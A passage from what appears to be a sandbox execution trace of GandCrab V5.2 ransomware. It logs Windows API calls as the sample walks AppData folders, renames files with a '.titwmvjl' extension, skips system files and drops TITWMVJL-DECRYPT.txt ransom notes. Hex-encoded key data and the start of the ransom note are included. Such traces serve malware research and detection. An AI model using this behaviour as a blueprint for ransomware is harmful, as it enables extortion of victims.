x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.786] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0079.787] CloseHandle (hObject=0x2bc) returned 1 [0079.787] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.787] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.787] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x6c)) [0079.788] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.788] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.788] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.788] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.788] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\vault\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0079.789] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.789] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\") returned 54 [0079.789] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*" [0079.789] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503938 [0079.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.789] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.790] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.790] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.790] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.790] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock" [0079.790] lstrlenW (lpString=".titwmvjl") returned 9 [0079.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.790] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.791] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0079.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.791] lstrlenW (lpString=".lock") returned 5 [0079.791] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.791] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.791] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.791] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.791] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.791] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.791] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.791] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt" [0079.791] lstrlenW (lpString=".titwmvjl") returned 9 [0079.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt") returned 74 [0079.791] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.792] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0079.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt") returned 74 [0079.792] lstrlenW (lpString=".txt") returned 4 [0079.792] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.792] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.792] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.792] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt") returned 74 [0079.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\TITWMVJL-DECRYPT.txt") returned 74 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.792] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.792] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.792] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0079.793] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0079.793] CloseHandle (hObject=0x2bc) returned 1 [0079.793] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.793] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0079.793] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0079.793] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows" [0079.793] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\" [0079.793] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.793] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.793] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.793] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0079.793] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0079.793] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Word" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word" [0079.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\" [0079.794] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.794] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.794] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.794] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.795] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.795] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.795] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.795] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\\\TITWMVJL-DECRYPT.txt") returned 74 [0079.795] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0079.796] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x